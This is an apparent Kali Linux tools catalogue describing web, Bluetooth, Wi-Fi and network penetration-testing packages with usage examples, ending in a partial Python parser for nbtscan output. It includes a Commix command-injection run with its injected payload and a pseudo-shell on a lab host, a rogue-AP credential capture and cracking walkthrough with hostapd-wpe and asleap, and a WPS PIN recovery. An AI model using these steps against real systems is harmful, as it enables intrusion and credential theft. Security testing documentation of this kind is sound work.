Channel: Penetration Testing Tools

Arachni

Arachni Package Description

Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart: it trains itself by learning from the HTTP responses it receives during the audit process, and it can perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify false positives.

It is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.

Source: http://arachni-scanner.com/

Arachni Homepage | Kali Arachni Repo

  • Author: Tasos “Zapotek” Lasko
  • License: Apache-2.0
Tools included in the arachni package
arachni_web – The Arachni web scanner
arachni_web Usage Example
root@kali:~# arachni_web
>> Thin web server (v1.5.1 codename Straight Razor)
>> Maximum connections set to 1024
>> Listening on 0.0.0.0:9292, CTRL+C to stop



BlueMaho

BlueMaho Package Description

BlueMaho is a GUI shell (interface) for a suite of tools for testing the security of Bluetooth devices. It is freeware, open source, written in Python and uses wxPython. It can be used for testing BT devices for known vulnerabilities and, the major thing to do, for testing to find unknown vulnerabilities. It can also produce nice statistics.

Features:

  • scan for devices, show advanced info, SDP records, vendor etc
  • track devices – show where and how many times a device was seen, and its name changes
  • loop scan – it can scan all the time, showing you online devices
  • alerts with sound if a new device is found
  • on_new_device – you can specify what command it should run when it finds a new device
  • it can use separate dongles – one for scanning (loop scan) and one for running tools or exploits
  • send files
  • change name, class, mode, BD_ADDR of local HCI devices
  • save results in a database
  • form nice statistics (unique devices by day/hour, vendors, services etc)
  • test remote device for known vulnerabilities (see exploits for more details)
  • test remote device for unknown vulnerabilities (see tools for more details)
  • themes! you can customize it

Source: https://wiki.thc.org/BlueMaho

BlueMaho Homepage | Kali BlueMaho Repo

  • Author: The Hacker’s Choice
  • License: GPLv2
Tools included in the bluemaho package
bluemaho.py – Suite of tools for testing security of bluetooth devices
bluemaho.py Usage Example
root@kali:~# bluemaho.py


Capstone

Capstone Package Description

Capstone is a disassembly framework with the target of becoming the ultimate disasm engine for binary analysis and reversing in the security community. Created by Nguyen Anh Quynh, then developed and maintained by a small community, Capstone offers some unparalleled features:

  • Support for multiple hardware architectures: ARM, ARM64 (aka ARMv8), Mips & X86
  • A clean/simple/lightweight/intuitive architecture-neutral API
  • Provides details on disassembled instructions (called a “decomposer” by others)
  • Provides semantics of the disassembled instruction, such as the list of implicit registers read & written
  • Implemented in pure C, with lightweight wrappers for C++, Python, Ruby, OCaml, C#, Java and Go available
  • Native support for Windows & *nix platforms (MacOSX, Linux & *BSD confirmed)
  • Thread-safe by design.

Source: http://www.capstone-engine.org/index.html

Capstone Homepage | Kali Capstone Repo

  • Author: COSEINC , Nguyen Anh Quynh
  • License: BSD
capstone Usage Example
root@kali:~# coming soon

CaseFile

CaseFile Package Description

CaseFile is the little brother to Maltego. It targets a unique market of ‘offline’ analysts whose primary sources of information are not gained from the open-source intelligence side or can be programmatically queried. We see these people as investigators and analysts who are working ‘on the ground’, getting intelligence from other people in the team and building up an information map of their investigation.

CaseFile gives you the ability to quickly add, link and analyze data having the same graphing flexibility and performance as Maltego without the use of transforms. CaseFile is roughly a third of the price of Maltego.

What does CaseFile do?

CaseFile is a visual intelligence application that can be used to determine the relationships and real world links between hundreds of different types of information.
It gives you the ability to quickly view second, third and n-th order relationships and find links otherwise undiscoverable with other types of intelligence tools.
CaseFile comes bundled with many different types of entities that are commonly used in investigations allowing you to act quickly and efficiently. CaseFile also has the ability to add custom entity types allowing you to extend the product to your own data sets.

What can CaseFile do for me?

CaseFile can be used for the information gathering, analytics and intelligence phases of almost all types of investigation, from IT security and law enforcement to any data-driven work. It will save you time and will allow you to work more accurately and smarter.
CaseFile has the ability to visualise datasets stored in CSV, XLS and XLSX spreadsheet formats.
We are not marketing people. Sorry.
CaseFile aids you in your thinking process by visually demonstrating interconnected links between searched items.
If access to “hidden” information determines your success, CaseFile can help you discover it.

Source: http://paterva.com/web6/products/casefile.php

CaseFile Homepage | Kali CaseFile Repo

  • Author: Paterva
  • License: Commercial
Tools included in the casefile package
casefile – Offline intelligence tool
casefile Usage Example
root@kali:~# casefile


Cuckoo

Cuckoo Package Description

Cuckoo Sandbox is a malware analysis system. You can throw any suspicious file at it and in a matter of seconds Cuckoo will provide detailed results outlining what the file did when executed inside an isolated environment.

Cuckoo generates a handful of different kinds of raw data, which include:

  • Native functions and Windows API calls traces
  • Copies of files created and deleted from the filesystem
  • Dump of the memory of the selected process
  • Full memory dump of the analysis machine
  • Screenshots of the desktop during the execution of the malware analysis
  • Network dump generated by the machine used for the analysis.

In order to make such results more consumable to end users, Cuckoo is able to process them and generate different types of reports, which can include:

  • JSON report
  • HTML report
  • MAEC report
  • MongoDB interface
  • HPFeeds interface

Source: http://www.cuckoosandbox.org/about.html

Cuckoo Homepage | Kali Cuckoo Repo

  • Author: Cuckoo Sandbox Developers
  • License: GPLv3
Tools included in the cuckoo package
Cuckoo Usage Example
root@kali:~# coming soon

ntop

ntop Package Description

ntop is a tool that shows the network usage, similar to what the popular top Unix command does. ntop is based on pcapture (ftp://ftp.ee.lbl.gov/pcapture.tar.Z) and it has been written in a portable way in order to virtually run on every Unix platform.

ntop can be used in both interactive or web mode. In the first case, ntop displays the network status on the user’s terminal whereas in web mode a web browser (e.g. netscape) can attach to ntop (that acts as a web server) and get a dump of the network status. In the latter case, ntop can be seen as a simple RMON-like agent with an embedded web interface.

ntop uses libpcap, a system-independent interface for user-level packet capture.
Source: ntop README

ntop Homepage | Kali ntop Repo

  • Author: Luca Deri
  • License: GPLv2
Tools included in the ntop package
ntop – display network usage in web browser
ntop Usage Example
Display network usage, filtering for a specific IP address (-B "src host 192.168.1.1"):
root@kali:~# ntop -B "src host 192.168.1.1"

RTLSDR Scanner

RTLSDR Scanner Package Description

A cross-platform Python frequency scanning GUI for USB TV dongles, using the OsmoSDR rtl-sdr library.
In other words, a cheap, simple spectrum analyser.
The scanner attempts to overcome the tuner’s frequency response by averaging scans from both the positive and negative frequency offsets of the baseband data.

Source: http://eartoearoak.com/software/rtlsdr-scanner

RTLSDR Scanner Homepage | Kali RTLSDR Scanner Repo

  • Author: Al Brown
  • License: GPLv3
Tools included in the rtlsdr-scanner package
rtlsdr-scanner – Python frequency scanning GUI for the OsmoSDR rtl-sdr library
rtlsdr-scanner Usage Example
root@kali:~# rtlsdr-scanner


Wireshark

wireshark Package Description

Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Wireshark has a rich feature set which includes the following:

  • Deep inspection of hundreds of protocols, with more being added all the time
  • Live capture and offline analysis
  • Standard three-pane packet browser
  • Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
  • Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
  • The most powerful display filters in the industry
  • Rich VoIP analysis
  • Capture files compressed with gzip can be decompressed on the fly
  • Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
  • Coloring rules can be applied to the packet list for quick, intuitive analysis
  • Output can be exported to XML, PostScript®, CSV, or plain text
  • Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
  • Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others

Source: http://www.wireshark.org/about.html

Wireshark Homepage | Kali Wireshark Repo

  • Author: Gerald Combs and contributors
  • License: GPLv2
Tools included in the wireshark package
wireshark – network traffic analyzer – GTK+ version
tshark – network traffic analyzer – console version
tshark Usage Example
root@kali:~# tshark -f "tcp port 80" -i eth0
wireshark Usage Example
root@kali:~# wireshark

Nishang

nishang Package Description

Nishang is a framework and collection of scripts and payloads which enables the use of PowerShell for offensive security and post-exploitation during Penetration Tests. The scripts are written on the basis of requirements the author encountered during real Penetration Tests.

It contains many interesting scripts like Keylogger, DNS TXT Code Execution, HTTP Backdoor, Powerpreter, LSA Secrets and much more.

Source: https://github.com/samratashok/nishang

Nishang Homepage | Kali Webshells Repo

  • Author: samratashok
  • License: None
webshells Directory
root@kali:~# ls -l /usr/share/nishang/
total 48
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Antak-WebShell
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Backdoors
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Escalation
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Execution
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Gather
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Misc
-rw-r--r-- 1 root root  495 Jun  4 11:14 nishang.psm1
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Pivot
drwxr-xr-x 2 root root 4096 Jun  4 11:15 powerpreter
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Prasadhak
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Scan
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Utility

Parsero

Parsero Package Description

Parsero is a free script written in Python which reads the Robots.txt file of a web server and looks at the Disallow entries. The Disallow entries tell the search engines which directories or files hosted on a web server mustn’t be indexed. For example, “Disallow: /portal/login” means that the content at www.example.com/portal/login is not allowed to be indexed by crawlers like Google, Bing, Yahoo… This is the way administrators avoid sharing sensitive or private information with the search engines.

But sometimes the paths typed in the Disallow entries are directly accessible by users without using a search engine, just by visiting the URL and the path, and sometimes they are not available to be visited by anybody… Because it is really common for administrators to write a lot of Disallow entries, some of which are available and some of which are not, you can use Parsero to check the HTTP status code of each Disallow entry and so check automatically whether these directories are available or not.

Also, the fact that an administrator writes a robots.txt doesn’t mean that the files or directories typed in the Disallow entries will not be indexed by Bing, Google, Yahoo… For this reason, Parsero is capable of searching Bing to locate content indexed without the web administrator’s authorization. Parsero checks the HTTP status code in the same way for each Bing result.

Source: https://github.com/behindthefirewalls/Parsero

Parsero Homepage | Kali parsero Repo

  • Author: Javier Nieto
  • License: GPLv2
Tools included in the parsero package
parsero – robots.txt audit tool
parsero Usage Example
Search for results from a website (-u www.bing.com) using Bing indexed Disallows (-sb):
root@kali:~# parsero -u www.bing.com -sb

      ____                              
     |  _ \ __ _ _ __ ___  ___ _ __ ___  
     | |_) / _` | '__/ __|/ _ \ '__/ _ \
     |  __/ (_| | |  \__ \  __/ | | (_) |
     |_|   \__,_|_|  |___/\___|_|  \___/

Starting Parsero v0.75 (https://github.com/behindthefirewalls/Parsero) at 06/09/14 12:48:25
Parsero scan report for www.bing.com
http://www.bing.com/travel/secure 301 Moved Permanently
http://www.bing.com/travel/flight/flightSearchAction 301 Moved Permanently
http://www.bing.com/travel/css 301 Moved Permanently
http://www.bing.com/results 404 Not Found
http://www.bing.com/spbasic 404 Not Found
http://www.bing.com/entities/search 302 Found
http://www.bing.com/translator/? 200 OK
http://www.bing.com/Proxy.ashx 404 Not Found
http://www.bing.com/images/search? 200 OK
http://www.bing.com/travel/hotel/hotelSearch 301 Moved Permanently
http://www.bing.com/static/ 404 Not Found
http://www.bing.com/offers/proxy/dealsserver/api/log 405 Method Not Allowed
http://www.bing.com/shenghuo 301 Moved Permanently
http://www.bing.com/widget/render 200 OK

PixieWPS

PixieWPS Package Description

Pixiewps is a tool written in C used to brute-force the WPS PIN offline, exploiting the low or non-existent entropy of some APs (pixie dust attack). It is meant for educational purposes only. All credits for the research go to Dominique Bongard.

Features:

  • Checksum optimization: it’ll try first for valid PINs (11’000);
  • Reduced entropy of the seed from 32 to 25 bits for the C LCG pseudo-random function;
  • Small Diffie-Hellman keys: don’t need to specify the Public Registrar Key if the same option is used with Reaver.

The program will also try first with E-S0 = E-S1 = 0, then it will try to brute-force the seed of the PRNG if the --e-nonce option is specified.

Source: https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool

PixieWPS Homepage | Kali PixieWPS Repo
Kali Forum Thread | Community Research Thread

  • Author: wiire
  • License: GPLv3
Tools included in the PixieWPS package
PixieWPS – Offline attack for WPS pin
PixieWPS Usage Example
root@kali:~# pixiewps \
>    -a 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c \
>    -e d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72:c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a \
>    -r bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e \
>    -s 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 \
>    -z b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec

 [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] PSK1: d4:eb:0c:2a:38:15:e1:a0:3d:70:db:74:31:eb:53:a3
 [*] PSK2: d3:b7:e6:23:f3:1d:22:0a:23:ea:07:bb:7f:76:65:8b
 [+] WPS pin: 04847533

 [*] Time taken: 0 s

root@kali:~#

Commix


Commix Package Description

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and can be used by web developers, penetration testers or even security researchers to test web applications with a view to finding bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in the Python programming language.

Source: https://github.com/stasinopoulos/commix
Commix Homepage | Kali Commix Repo | Kali Commix Package

  • Author: Anastasios Stasinopoulos
  • License: GPLv3

Tools included in the Commix package

Commix – Automated All-in-One OS Command Injection and Exploitation Tool
root@kali:~# commix
                                       __          
   ___    ___     ___ ___     ___ ___ /\_\   __  _  
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.3b-nongit-20160104 }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2015 Anastasios Stasinopoulos (@ancst)
+--

Usage: python commix.py [options]

Options:
  -h, --help            Show help and exit.

  General:
    These options relate to general matters.

    --verbose           Enable the verbose mode.
    --version           Show version number and exit.
    --output-dir=OUT..  Set custom output directory path.

  Target:
    This options has to be provided, to define the target URL.

    --url=URL           Target URL.
    --url-reload        Reload target URL after command execution.

  Request:
    These options can be used to specify how to connect to the target URL.

    --host=HOST         HTTP Host header.
    --referer=REFERER   HTTP Referer header.
    --user-agent=AGENT  HTTP User-Agent header.
    --random-agent      Use a randomly selected HTTP User-Agent header.
    --param-del=PDEL    Set character for splitting parameter values.
    --cookie=COOKIE     HTTP Cookie header.
    --cookie-del=CDEL   Set character for splitting cookie values.
    --headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
    --proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
    --tor               Use the Tor network.
    --tor-port=TOR_P..  Set Tor proxy port (Default: 8118).
    --auth-url=AUTH_..  Login panel URL.
    --auth-data=AUTH..  Login parameters and data.
    --auth-type=AUTH..  HTTP authentication type (e.g. 'basic').
    --auth-cred=AUTH..  HTTP Authentication credentials (e.g. 'admin:admin').

  Enumeration:
    These options can be used to enumerate the target host.

    --current-user      Retrieve current user name.
    --hostname          Retrieve current hostname.
    --is-root           Check if the current user have root privileges.
    --is-admin          Check if the current user have admin privileges.
    --sys-info          Retrieve system information.
    --users             Retrieve system users.
    --passwords         Retrieve system users password hashes.
    --privileges        Retrieve system users privileges.

  File access:
    These options can be used to access files on the target host.

    --file-read=FILE..  Read a file from the target host.
    --file-write=FIL..  Write to a file on the target host.
    --file-upload=FI..  Upload a file on the target host.
    --file-dest=FILE..  Host's absolute filepath to write and/or upload to.

  Modules:
    These options can be used increase the detection and/or injection
    capabilities.

    --icmp-exfil=IP_..  The 'icmp exfiltration' injection technique
                        (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').
    --shellshock        The 'shellshock' injection technique.

  Injection:
    These options can be used to specify which parameters to inject and to
    provide custom injection payloads.

    --data=DATA         POST data to inject (use 'INJECT_HERE' tag to specify
                        the testable parameter).
    --suffix=SUFFIX     Injection payload suffix string.
    --prefix=PREFIX     Injection payload prefix string.
    --technique=TECH    Specify injection technique(s) to use.
    --maxlen=MAXLEN     The length of the output on time-based technique
                        (Default: 10000 chars).
    --delay=DELAY       Set Time-delay for time-based and file-based
                        techniques (Default: 1 sec).
    --tmp-path=TMP_P..  Set remote absolute path of temporary files directory
                        (Default: ).
    --root-dir=SRV_R..  Set remote absolute path of web server's root
                        directory (Default: ).
    --alter-shell=AL..  Use an alternative os-shell (e.g. Python).
    --os-cmd=OS_CMD     Execute a single operating system command.
    --base64            Encode the operating system command to Base64 format.


root@kali:~#

Commix Usage Example

root@kali:~# commix --url http://192.168.20.12/dvwa/vulnerabilities/exec/ \
>   --cookie='PHPSESSID=cj645co26lgve7ro1kc9dvt3a0; security=low' \
>   --data='ip=INJECT_HERE&Submit=Submit'
                                       __          
   ___    ___     ___ ___     ___ ___ /\_\   __  _  
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.3b-nongit-20160104 }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2015 Anastasios Stasinopoulos (@ancst)
+--

(*) Checking connection to the target URL... [ SUCCEED ]
(^) Warning: Heuristics have failed to identify server's operating system.
(?) Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > w
(*) Setting the (POST) 'ip' parameter for tests.
(^) Warning: Due to the relatively slow response of 'cmd.exe' there may be delays during the data extraction procedure.
(*) Testing the classic injection technique... [ SUCCEED ]
(!) The (POST) 'ip' parameter is vulnerable to Results-based Command Injection.
  (+) Type : Results-based Command Injection
  (+) Technique : Classic Injection Technique
  (+) Payload : %26 for /f "delims=" %i in ('cmd /c "set /a (49+1)"') do @set /p = AWMZVA%iAWMZVAAWMZVA <nul

(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > y

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > whoami

nt authority\iusr

commix(os_shell) >

hostapd-wpe


hostapd-wpe Package Description

hostapd-wpe is the replacement for FreeRADIUS-WPE.

It implements IEEE 802.1x Authenticator and Authentication Server impersonation attacks to obtain client credentials, establish connectivity to the client, and launch other attacks where applicable.

hostapd-wpe supports the following EAP types for impersonation:
1. EAP-FAST/MSCHAPv2 (Phase 0)
2. PEAP/MSCHAPv2
3. EAP-TTLS/MSCHAPv2
4. EAP-TTLS/MSCHAP
5. EAP-TTLS/CHAP
6. EAP-TTLS/PAP

Once impersonation is underway, hostapd-wpe will return an EAP-Success message so that the client believes they are connected to their legitimate authenticator.

For 802.11 clients, hostapd-wpe also implements Karma-style gratuitous probe responses. Inspiration for this was provided by JoMo-Kun’s patch for older versions of hostapd.

Patch Source: https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe
hostapd Homepage | Kali hostapd-wpe Repo | Kali hostapd-wpe Package

  • Patch Author: Thomas d’Otreppe
  • License: BSD license
hostapd-wpe

hostapd-wpe usage

hostapd-wpe – Modified hostapd to facilitate AP impersonation attacks

Update your Kali installation, install hostapd-wpe if not already present.

root@kali:~# apt update
root@kali:~# apt install hostapd-wpe

Once installed, configure AP properties by editing /etc/hostapd-wpe/hostapd-wpe.conf

root@kali:~# nano /etc/hostapd-wpe/hostapd-wpe.conf

Kill network-manager using airmon-ng

root@kali:~# airmon-ng check kill

Start hostapd-wpe. A wireless AP will appear. Passwords of users connecting and authenticating to this network will be printed to the console.

root@kali:~# hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
Configuration file: /etc/hostapd-wpe/hostapd-wpe.conf
Using interface wlan0 with hwaddr c4:e9:84:17:ff:c8 and ssid "hostapd-wpe"
wlan0: interface state UNINITIALIZED>ENABLED
wlan0: AP-ENABLED
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: authenticated
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED ac:fd:ec:78:72:bd
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25

mschapv2: Sat Nov 12 16:04:03 2016
username: me
challenge: 8e:0e:9d:0b:5a:3f:f5:23
response: 34:f8:42:4d:16:c7:2d:69:cc:38:10:d4:cf:71:f7:83:37:68:d8:8a:e9:86:f2:67
jtr NETNTLM: me:$NETNTLM$8e0e9d0b5a3ff523$34f8424d16c72d69cc3810d4cf71f7833768d88ae986f267

wlan0: CTRL-EVENT-EAP-FAILURE ac:fd:ec:78:72:bd
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.1X: authentication failed - EAP type: 0 (unknown)
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.1X: Supplicant used different EAP type: 25 (PEAP)
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: disassociated
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: deauthenticated due to local deauth request
wlan0: AP-DISABLED
nl80211: deinit ifname=wlan0 disabled_11b_rates=0
root@kali:~#

Once a challenge and response are obtained, crack them using asleap, together with a password dictionary file.

root@kali:~# zcat /usr/share/wordlists/rockyou.txt.gz | asleap -C 8e:0e:9d:0b:5a:3f:f5:23 -R 34:f8:42:4d:16:c7:2d:69:cc:38:10:d4:cf:71:f7:83:37:68:d8:8a:e9:86:f2:67 -W -
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using STDIN for words.
hash bytes: 586c
NT hash: 8846f7eaee8fb117ad06bdd830b7586c
password: password

Gobuster


Gobuster Package Description

Gobuster is a tool used to brute-force:

  • URIs (directories and files) in web sites.
  • DNS subdomains (with wildcard support).

Because I wanted:

  1. something that didn’t have a fat Java GUI (console FTW).
  2. to build something that just worked on the command line.
  3. something that did not do recursive brute force.
  4. something that allowed me to brute force folders and multiple extensions at once.
  5. something that compiled to native on multiple platforms.
  6. something that was faster than an interpreted script (such as Python).
  7. something that didn’t require a runtime.
  8. use something that was good with concurrency (hence Go).
  9. to build something in Go that wasn’t totally useless.

Source: https://github.com/OJ/gobuster
Gobuster Homepage | Kali gobuster Repo

  • Author: OJ Reeves
  • License: Apache-2.0

Tools included in the gobuster package

gobuster – Directory/file and DNS busting tool written in Go
root@kali:~# gobuster -h
Usage of gobuster:
  -P string
        Password for Basic Auth (dir mode only)
  -U string
        Username for Basic Auth (dir mode only)
  -a string
        Set the User-Agent string (dir mode only)
  -c string
        Cookies to use for the requests (dir mode only)
  -e    Expanded mode, print full URLs
  -f    Append a forward-slash to each directory request (dir mode only)
  -fw
        Force continued operation when wildcard found (dns mode only)
  -i    Show IP addresses (dns mode only)
  -l    Include the length of the body in the output (dir mode only)
  -m string
        Directory/File mode (dir) or DNS mode (dns) (default "dir")
  -n    Don't print status codes
  -p string
        Proxy to use for requests [http(s)://host:port] (dir mode only)
  -q    Don't print the banner and other noise
  -r    Follow redirects
  -s string
        Positive status codes (dir mode only) (default "200,204,301,302,307")
  -t int
        Number of concurrent threads (default 10)
  -u string
        The target URL or Domain
  -v    Verbose output (errors)
  -w string
        Path to the wordlist
  -x string
        File extension(s) to search for (dir mode only)

gobuster Usage Examples

Scan a website (-u http://192.168.0.155/) for directories using a wordlist (-w /usr/share/wordlists/dirb/common.txt) and print the full URLs of discovered paths (-e):

root@kali:~# gobuster -e -u http://192.168.0.155/ -w /usr/share/wordlists/dirb/common.txt

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.0.155/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 301,302,307,200,204
[+] Expanded     : true
=====================================================
http://192.168.0.155/blog (Status: 301)
http://192.168.0.155/index.html (Status: 200)
http://192.168.0.155/index (Status: 200)
http://192.168.0.155/photo (Status: 301)
http://192.168.0.155/wordpress (Status: 301)
=====================================================

nbtscan-unixwiz


nbtscan-unixwiz Package Description

This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, which is a first step in finding open shares. It is based on the functionality of the standard Windows tool nbtstat, but it operates on a range of addresses instead of just one.

Source: http://unixwiz.net/tools/nbtscan.html
nbtscan-unixwiz Homepage | Kali nbtscan-unixwiz Repo

  • Author: Steve Friedl
  • License: public-domain

Tools included in the nbtscan-unixwiz package

nbtscan-unixwiz – Scanner for open NETBIOS nameservers
root@kali:~# nbtscan-unixwiz
nbtscan 1.0.35 - 2008-04-08 - http://www.unixwiz.net/tools/

usage: nbtscan-unixwiz [options] target [targets...]

   Targets are lists of IP addresses, DNS names, or address
   ranges. Ranges can be in /nbits notation ("192.168.12.0/24")
   or with a range in the last octet ("192.168.12.64-97")

   -V        show Version information
   -f        show Full NBT resource record responses (recommended)
   -H        generate HTTP headers
   -v        turn on more Verbose debugging
   -n        No looking up inverse names of IP addresses responding
   -p <n>    bind to UDP Port <n> (default=0)
   -m        include MAC address in response (implied by '-f')
   -T <n>    Timeout the no-responses in <n> seconds (default=2 secs)
   -w <n>    Wait <n> msecs after each write (default=10 ms)
   -t <n>    Try each address <n> tries (default=1)
   -P        generate results in perl hashref format

nbtscan-unixwiz Usage Examples

Scan a range of IP addresses (192.168.0.100-110) without doing inverse name lookups (-n):

root@kali:~# nbtscan-unixwiz -n 192.168.0.100-110
192.168.0.105   WORKGROUP\RETROPIE              SHARING
*timeout (normal end of scan)

Scan a single IP address (192.168.0.38) and show Full NBT resource record responses (-f):

root@kali:~# nbtscan-unixwiz -f 192.168.0.38
192.168.0.38    WORKGROUP\DOOKOSSEL             SHARING
  DOOKOSSEL      <00> UNIQUE Workstation Service
  DOOKOSSEL      <03> UNIQUE Messenger Service<3>
  DOOKOSSEL      <20> UNIQUE File Server Service
  ..__MSBROWSE__.<01> GROUP  Master Browser
  WORKGROUP      <00> GROUP  Domain Name
  WORKGROUP      <1d> UNIQUE Master Browser
  WORKGROUP      <1e> GROUP  Browser Service Elections
  00:00:00:00:00:00   ETHER
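The `-f` output above is a NetBIOS name table: each line is a name, a hex suffix code in angle brackets, a UNIQUE/GROUP flag and a description. The parser below, an added example that is not part of nbtscan-unixwiz, turns that text into host records so a scan of your own network can be checked for which hosts advertise file sharing (<20>) or act as Master Browser (<1d>). The sample output is constructed from the lines shown on this page.

```python
"""Parse `nbtscan-unixwiz -f` output into structured host records (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Common NetBIOS name suffix codes; unknown suffixes get a generic label.
SUFFIX_LABELS = {
    0x00: "Workstation Service / Domain Name",
    0x01: "Master Browser (__MSBROWSE__)",
    0x03: "Messenger Service",
    0x1B: "Domain Master Browser",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections",
    0x20: "File Server Service",
}
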